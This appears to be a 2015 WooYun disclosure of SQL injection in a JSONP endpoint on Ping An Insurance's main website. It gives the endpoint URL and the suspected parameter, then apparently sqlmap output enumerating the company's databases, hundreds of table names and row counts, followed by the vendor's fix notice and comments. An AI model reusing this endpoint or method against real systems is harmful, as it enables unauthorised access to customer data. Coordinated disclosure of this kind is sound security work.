当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099733

漏洞标题:中国平安主站一App云端SQL注入

相关厂商:中国平安保险(集团)股份有限公司

漏洞作者: Arthur

提交时间:2015-03-06 00:30

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-06: 细节已通知厂商并且等待厂商处理中
2015-03-09: 厂商已经确认,细节仅向厂商公开
2015-03-19: 细节向核心白帽子及相关领域专家公开
2015-03-29: 细节向普通白帽子公开
2015-04-08: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

详细说明:

URL:http://www.pingan.com/cms-tmplt/portalJsonpController.do?callback=jsonp1&method=articleList&channelId=424&channelLevel=2&number=10&pageNumber=1&publishDate=&_=1425241672662
参数给忘记了。。
好像是number

漏洞证明:

available databases [12]:
[*] DBMGR
[*] DBQUA
[*] PA18ADMSDATA
[*] PA18CMSDATA
[*] PA18DATA
[*] PA18LOGTMP
[*] PA18TSDATA
[*] PA18WCMDATA
[*] PORTALDATA
[*] SYS
[*] SYSTEM
[*] TOAD
Database: PA18CMSDATA
[301 tables]
+--------------------------------+
| ACTIVE_GOHOME |
| ACTIVE_INFO |
| ACTIVE_NOHOME |
| ACTIVITY_ADMIN_INFO |
| ACTIVITY_MEMBER_LOG |
| ACTIVITY_PRIZE_ADMIN_INFO |
| ACTIVITY_PRIZE_PUBLISH_INFO |
| ACTIVITY_PUBLISH_INFO |
| ACTIVITY_USER |
| ACTIVITY_WHITE_LIST_ADMIN |
| ACTIVITY_WHITE_LIST_PUBLISH |
| ACTIVITY_WINNER_LIST |
| ACT_ANYDOOR14_SEND_MSG |
| ACT_WORLDCUP_AUGURST |
| ACT_WORLDCUP_AUGURSTAGE |
| ACT_WORLDCUP_AUGURTEAM |
| ACT_WORLDCUP_AUGURUSER |
| ACT_WORLDCUP_INTERESTANSWER |
| ACT_WORLDCUP_INTERESTQUESTION |
| ACT_WORLDCUP_TESTPRIZEUSER |
| ACT_WORLDCUP_USERANSWER |
| ALLOW |
| BFXR_ACTIVITY_INFO |
| BFXR_ADMIN_INFO |
| BFXR_AGENT_INFO |
| BFXR_AGENT_INFO_IMG |
| BFXR_AGENT_INFO_IMG_TEMP |
| BFXR_AGENT_INFO_RELEASE |
| BFXR_AUDITING_INFO |
| BFXR_CLIENT_DETAIL_INFO |
| BFXR_CLIENT_INFO |
| BFXR_DEPT_INFO_IMG |
| BFXR_REGION_HIBERARCHY_IMG |
| BFXR_REGION_INFO_IMG |
| BFXR_RELEASE_ANSWER_INFO |
| BFXR_SENSITIVE_INFO |
| BFXR_VOTE_INFO |
| BOARD |
| BOARDDEFINE |
| BOARDLINK |
| CDS_EXECUTION |
| CDS_RULE |
| CF_DATA_LOG |
| CF_TOSEND_INFO1 |
| CF_TOSEND_INFO2 |
| CF_TOSEND_INFO3 |
| CF_TOSEND_PIGEONHOLE |
| CF_TOSEND_STATE |
| CF_TOSEND_TRIM |
| CHANNELSCHEMA |
| CHANNELSCHEMA2 |
| CMS_ACL |
| CMS_ATTACH |
| CMS_BAIDU_LOTTERY_INFO |
| CMS_CHANNEL |
| CMS_CODE |
| CMS_COLUMN |
| CMS_CONTENT |
| CMS_CTRIP_LOTTERY_INFO |
| CMS_CTRIP_ORDER_INFO |
| CMS_DB_LOG |
| CMS_DB_REQ_LOG |
| CMS_ENDOWMENT_INSURANCE_IP |
| CMS_ENDOWMENT_INSURANCE_PLAYER |
| CMS_EXAM_PRECONTRACT_RECORD |
| CMS_EXAM_RECORD |
| CMS_FILEATTRIBUTE |
| CMS_LOTTERY_INFO |
| CMS_PAGES |
| CMS_WLT_POINTS_RECHARGE_LOG |
| CM_PRICE_PENSION_PUBLISH |
| CONTENTLOG |
| CONTENTPROPERTY |
| CONTENTSTATUS |
| CONTENTVERSION |
| CONTENTVIEW |
| COUPON_COUNT |
| CREDITCARD_WECHAT_THSH_INFO |
| CULTURE_SURVEY |
| CZNJJ_AWARD_INFO |
| CZNJJ_FUND_INFO |
| CZNJJ_USER_INFO |
| CZNJJ_VOTE_INFO |
| DBDEP_EXECUTION |
| DBDEP_LOG |
| DBDEP_SCAN |
| DBDEP_TASK |
| DBDEP_TASK_FIELD |
| DBSPIDER |
| DBSPIDEREXECUTION |
| DBSPIDERFIELD |
| DBSPIDERRECORD |
| DBSPIDERSCHEDULE |
| DELEGATE |
| DEP_EXECUTION |
| DEP_LOG |
| DEP_RECORD |
| DEP_SCAN |
| DEP_TASK |
| DIRDELEGATE |
| DOWNLOAD_MATERIAL |
| ELEMENT_ITEM |
| ELEMENT_TYPE |
| EMAIL_NOTE_INFO |
| EMAIL_NOTE_INFO_H |
| EMAIL_SEND_TASK |
| EMAIL_SEND_TASK_H |
| EXAM_CLINIC_RECORD |
| EX_VOTE |
| FAMILY_LETTER |
| FEE_RULE |
| FORM_CHANNEL |
| FORM_DEFINITION |
| FORM_FIELD |
| FORM_OLDVALUE |
| FORM_RULES |
| FORM_TASK |
| FORM_VALUE |
| GAME_USER_LOGIN |
| GW_ACT_SYS_ACTIVITY_TYPE |
| GW_ACT_SYS_BASEINFO_ACTTYPE |
| GW_ACT_SYS_BASE_INFO |
| GW_ACT_SYS_BASE_INFO_P |
| GW_ACT_SYS_CHOUJIANG_LOG |
| GW_ACT_SYS_CHOUJIANG_PRIZEINFO |
| GW_ACT_SYS_CHOUJIANG_WINNER |
| GW_ACT_SYS_CJ_PRIZEINFO_P |
| GW_ACT_SYS_TEMPLATE_CHOUJIANG |
| GW_ACT_SYS_TEMPLATE_CJ_P |
| HAIER_JCX_CUSTOMER_INFO |
| HUODONG_RECORD |
| IDMANAGER |
| IMAGEUPLOAD |
| IMGLIB |
| IMGLIBTYPE |
| INBOX |
| INFO_ARTICLE |
| INFO_ARTICLE_BACKUP |
| INFO_ARTICLE_CHANNEL |
| INFO_ARTICLE_DETAIL |
| INFO_ATTACHMENT |
| INFO_CHANNEL |
| INSURANCE_ANALYSIS |
| INSURANCE_JOB |
| ISSUE |
| ITJOB_APPLY_JOB |
| ITJOB_ATTACHMENT |
| ITJOB_JOB |
| ITJOB_JOB_SEEKER |
| IWCMS_LIZHILEITAI |
| JRCSB_REQUEST_TICKET_RECORD |
| KEYWORD |
| KEYWORDLINK |
| KEYWORDTYPE |
| KFJ_FINALS_USER_INFO |
| KFJ_FINALS_VOTE_INFO |
| KFJ_POSTERS_INFO |
| KFJ_SEND_SCORE_INFO |
| KFJ_USER_INFO |
| KFJ_USER_TIMES_COUNT |
| KFJ_VOLUNTEER_USER_INFO |
| KFJ_VOLUNTEER_VOTE_INFO |
| KFJ_VOTE_INFO |
| LCS_BRANCH_INFO |
| LCS_CUSTODYREGION_RELATIONSHIP |
| LCS_CUSTODY_TBL |
| LIFE_INSURANCE_OCCUPATION |
| LOCK_RESOURCE |
| LOCK_RESOURCE_HISTORY |
| LUCY_CONVERT_NOTE |
| LUCY_USER_AWARD |
| LUCY_USER_DETAIL |
| LUCY_USER_INFO |
| L_BOOKING_APPL_MAS |
| L_BOOKING_APPL_MAS_CITY |
| L_BOOKING_CALC_MAS |
| L_BOOKING_CITY |
| L_BOOKING_COUNTY |
| L_BOOKING_DETAIL_MAS |
| L_BOOKING_INTRODUCER_INFO |
| L_BOOKING_PROVINCE |
| MAGAZINE |
| MARKET_USER_INFO |
| MARKET_VOTE_INFO |
| MATERIAL |
| MATERIAL_BRANCHS |
| MEDIA_SOURCE_CODE_INFO |
| MICROSITE |
| MICROSITECLUSTER |
| MOBILEPHONE_BRAND |
| MOBILEPHONE_CONSTANT |
| MOBILEPHONE_DOWNLOAD |
| MOBILEPHONE_MODEL |
| MOBILEPHONE_SERIES |
| MSG_TEMPLATE |
| NEWSPAPER |
| OC_APPROVAL_CHAIN |
| OC_APPROVAL_WORKFLOW |
| OC_WORKFLOW_TAST |
| ONEBAO_ACTIVITY_APPRAISE |
| PA18_CC_TOA_INVITATION |
| PA18_CDN_ACCESSING_NOTE |
| PA18_GZXMFL_QUALIFY |
| PA18_QUEST_PRIZE |
| PA18_QUEST_PRIZE2 |
| PA18_QUEST_PRIZE2_BAK |
| PA18_QUEST_REFER |
| PA18_QUEST_REFER2 |
| PA18_QUEST_REFER2_BAK |
| PA18_QUEST_SETTING |
| PA18_QUEST_SETTING2 |
| PA18_QUEST_SETTING2_BAK |
| PA18_QUEST_WIN_LIST |
| PA18_QUEST_WIN_LIST2 |
| PA18_QUEST_WIN_LIST2_BAK |
| PA18_TEL_EMPLOYEE_INFO_NEW |
| PA18_TOA_REGISTER_LOG |
| PA18_TOKEN_SETTING |
| PAGE |
| PAGECOLUMN |
| PAGECONTENT |
| PAWEB_ZNQ_AUDITING_INFO |
| PAWEB_ZNQ_CLIENT_DETAIL |
| PAWEB_ZNQ_CLIENT_INFO |
| PAWEB_ZNQ_VOTE_DETAIL |
| PAWEB_ZNQ_VOTE_INFO |
| PAWEB_ZYRS_CLIENT_INFO |
| PAWEB_ZYRS_CLIENT_INFO_HT1 |
| PAWEB_ZYRS_CLIENT_INFO_HT2 |
| PAWEB_ZYRS_CLIENT_INFO_IP |
| PAWEB_ZYRS_MANAGE_INFO |
| PAWEB_ZYRS_PREMIUM_INFO |
| PAWEB_ZYRS_RECOGNIZEE_INFO |
| PA_COMMENT_RECORD |
| PA_COMMENT_SIFT_WORD |
| PA_DD_COUPON |
| PA_DD_MERCHANTS_COUPON |
| PA_JOB_CACHE_TAG |
| PA_PASH_YOUHUI_EXTERNAL |
| PA_PASH_YOUHUI_INFO |
| PREVIEWFIGURE |
| QRTZ_BLOB_TRIGGERS |
| QRTZ_CALENDARS |
| QRTZ_CRON_TRIGGERS |
| QRTZ_FIRED_TRIGGERS |
| QRTZ_JOB_DETAILS |
| QRTZ_JOB_LISTENERS |
| QRTZ_LOCKS |
| QRTZ_MSG_TB_RELATION |
| QRTZ_PAUSED_TRIGGER_GRPS |
| QRTZ_PROCESS_MSG |
| QRTZ_SCHEDULER_STATE |
| QRTZ_SIMPLE_TRIGGERS |
| QRTZ_TRIGGERS |
| QRTZ_TRIGGER_LISTENERS |
| RECYLE |
| REGION_CODE_RELATION |
| RELATIVEARTICLES |
| RELDEFINE |
| ROLES |
| SCHOOL_INFO |
| SCHOOL_JOIN_INFO |
| SEARCHMETADATA |
| SEARCH_CUSTOMERACTION |
| SEARCH_CUSTOMERACTION_H |
| SECKILL_INFO |
| SECKILL_RECORD |
| SEND_MSG_RECORD |
| SHORT_ADDRESS_OFFLINE |
| SHORT_ADDRESS_OFFLINE_H |
| SHORT_ADDRESS_ONLINE |
| SHORT_ADDRESS_ONLINE_H |
| SMS_FREQUENCY |
| SMS_NOTE_INFO |
| SMS_NOTE_INFO_H |
| SMS_RECEIVE_TASK |
| SMS_SEND_TASK |
| SMS_SEND_TASK_H |
| SPIDER_LOG |
| SUBJECT |
| SUBJECTCOLUMN |
| SUBJECTTYPE |
| SYSCONFIG |
| SYSLOG |
| SYSUSERGROUP |
| SYSUSER_GROUP |
| TOA_LOGIN_PARMS |
| USERMANAGER |
| USERROLE |
| USER_USERS |
| WEBSPIDER |
| WEBSPIDEREXECUTION |
| WEBSPIDERQUEUE |
| WEBSPIDERRECORD |
| WEBSPIDERSCHEDULE |
| WFSTEP |
| WFSTEPINSTANCE |
| WORKFLOW |
| WORKFLOW_EOA_TASK |
| YLX_2014_KFJ_TOUBAO_LIST |
| YLX_2014_KFJ_WINNER_LIST |
+--------------------------------+
Database: SYSTEM
+-------+---------+
| Table | Entries |
+-------+---------+
| HELP | 919 |
+-------+---------+
Database: SYS
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| STMT_AUDIT_OPTION_MAP | 270 |
| SYSTEM_PRIVILEGE_MAP | 208 |
| AUDIT_ACTIONS | 181 |
| TABLE_PRIVILEGE_MAP | 26 |
+-----------------------+---------+
Database: PORTALDATA
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| CM_PROPERTY | 1121516 |
| CM_NODE | 93529 |
| CM_PROPERTY_DEFINITION | 419 |
| CM_OBJECT_CLASS | 31 |
+------------------------+---------+
Database: PA18WCMDATA
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| CMS_ONLINE_RESOURCE_EXPAND | 1154122 |
| CMS_OFFLINE_RESOURCE_EXPAND | 1024432 |
| KEYWORD_RANK | 654264 |
| CMS_ONLINE_RESOURCE_PROPS | 155075 |
| CMS_OFFLINE_RESOURCE_PROPS | 104180 |
| PAWEB_FUND_RESOURCE_EXPAND | 2175 |
| KEYWORD_LINK_LIBRARY | 1211 |
| PAWEB_FUND_RELATION | 804 |
| PAWEB_FUND_RESOURCE_PROPS | 750 |
| SEARCH_PAGEWEIGHT | 6 |
| CMS_ASYNC_LOAD_LIST | 5 |
| WARN_EMAIL | 4 |
+-----------------------------+---------+
Database: PA18TSDATA
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| IWCMS_DCR_EXT | 55597 |
| PA18_CMS_CONTENT | 19451 |
| CMS_KEYWORD | 6676 |
| IWCMS_DCR | 2417 |
| PA18_CMS_DCR | 834 |
| PA18_CMS_CONTENT_EXT | 579 |
| PA18_CMS_WAP | 318 |
| PA18_CMS_INFO | 63 |
| PA18_CMS_WAP_PROVINCE | 31 |
| PA18_CMS_WAP_COMPANY | 19 |
| PA18_CMS_SEQ_CONFIG_INFO | 5 |
| PA18_CMS_WAP_TYPE | 4 |
+--------------------------+---------+
Database: PA18LOGTMP
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| OC_ADR_BOOK_ID_TMP | 2 |
+--------------------+---------+
Database: DBMGR
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| STAT_ITL_WAITS | 304557 |
| UPD_PK_SQL_STATMENT | 22762 |
| DBA_MONITOR_LOG_DETAIL | 15800 |
+------------------------+---------+
Database: PA18DATA
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| LOTTERY_RECORD | 10824746 |
| USER_SATISF_SURVEY | 10763634 |
| BFXR_CUSTOMER_VISITS | 8258986 |
| PA18_LIFE_INSURANCE_FESTIVA | 3575994 |
| OC_CUST_SEND | 1475951 |
| PA18_CS_CASE_INFO | 712675 |
| PA18_CONTACT_US_INFO | 689959 |
| PA18_IB_USER | 229630 |
| PA18_IB_MAIN | 229629 |
| PA18_CREAITCARD_MAIL_INFO | 144419 |
| OC_CUST | 134217 |
| SERVE_MAMMON_SIGNIN | 90478 |
| PA18_TEL_EMPLOYEE_INFO | 67221 |
| OC_CUST_ORDER | 60292 |
| SERVE_MAMMON_CLIENT | 50980 |
| PA18_ENTERPRISE_ANNUITY | 41246 |
| LCYX_COUNTDEL | 12099 |
| BFXR_NOVOICE_SPEAK | 12009 |
| PA18_CONTACT_US_NO | 7635 |
| HEALTH_CN_MAIL | 6916 |
| LCYX_LOGIN_DETAIL | 3806 |
| BANK_ATM | 3366 |
| OC_EDM_TAG | 2765 |
| OC_MAG_MORE_TAG | 2193 |
| LCYX_USER | 1801 |
| PA18_NETWORKFINANCING | 1700 |
| PA18_BANK_FINANCING_INFO | 1035 |
| BANK_NETWORK | 594 |
| BANK_BRANCH | 546 |
| OC_MAG_FIELD | 436 |
| BFXR_CITY_ORG_MAPPING | 351 |
| CC_FIELD_DICT | 287 |
| OC_TABLE_TAG | 286 |
| OC_SEND_TASK | 257 |
| OC_MORE_TAG | 251 |
| BANK_DISTRICT | 245 |
| CC_USER | 177 |
| OC_MAG_INFO | 174 |
| OC_PAGE_TAG | 151 |
| OC_INFO | 118 |
| HEALTH_EN_MAIL | 116 |
| OC_MAGAZINE | 105 |
| CC_PERMISSION | 84 |
| LOTTERY_RULES | 74 |
| OC_FIELD_TAG | 56 |
| OC_INFO_TAG | 53 |
| BANK_CITY | 45 |
| SERVE_MAMMON_QUOTA | 38 |
| OC_ADR_BOOK | 23 |
| CC_FUNC_OPR | 22 |
| CC_OPR | 22 |
| OC_CUST_OPER_LOG | 18 |
| BANK_PROVINCE | 17 |
| OC_TABLE_TEMPLATE | 16 |
| OC_TEMPLATE | 16 |
| CC_GROUP | 9 |
| BANK_FOREIGN_EXCHANGE | 8 |
| OC_MAG_TYPE | 8 |
| OC_MAG_ADVERT | 6 |
| LCYX_JFLX | 4 |
| CC_TYPE | 3 |
| SERVE_MAMMON_RULE | 3 |
| OC_ADVERT_TAG | 2 |
| CC_FUNC | 1 |
| OC_UTIL | 1 |
+-----------------------------+---------+
Database: DBQUA
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| OUTLINE_OPER_HIST | 904172 |
| OUTLINE_HISTORY | 218 |
| CURRENT_OUTLINE | 1 |
+-------------------+---------+
Database: PA18ADMSDATA
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| DSP_ADMS_AUCTION_RESULT | 636 |
| DSP_ADMS_AUCTION_PROCESS | 359 |
| DSP_PURCHASER_USER_INFO | 81 |
| DSP_ADMS_AUCTION_INFO | 55 |
| DSP_DEPT_INFO | 45 |
| ADMS_PRODUCT_INFO | 25 |
| ADMS_ADVERT_LABEL_RELATION | 19 |
| ADMS_COMPANY_INFO | 16 |
| ADMS_LABEL_INFO | 12 |
| DSP_ADMIN_USER_INFO | 12 |
| DSP_AUCTION_NOTICE | 8 |
| DSP_AUCTION_CATEGORY | 2 |
| DSP_SYSTEM_CONFIG | 1 |
+----------------------------+---------+

修复方案:

APP服务端也要注意
特别是这个,还在主站,那么多个数据库完全被注入下来危害不小。

版权声明:转载请注明来源 Arthur@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-03-09 11:08

厂商回复:

漏洞以修复

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-09 11:54 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    又是注射,给五分的

  2. 2015-03-09 12:46 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    修复效率很赞!

  3. 2015-03-09 17:03 | Arthur ( 实习白帽子 | Rank:77 漏洞数:33 | USA,I am coming!!!!!)

    主站注入才5 rank??OMG!早知道不提交了!

  4. 2015-03-09 21:25 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @Arthur 去报名众测吧。 :) 你懂的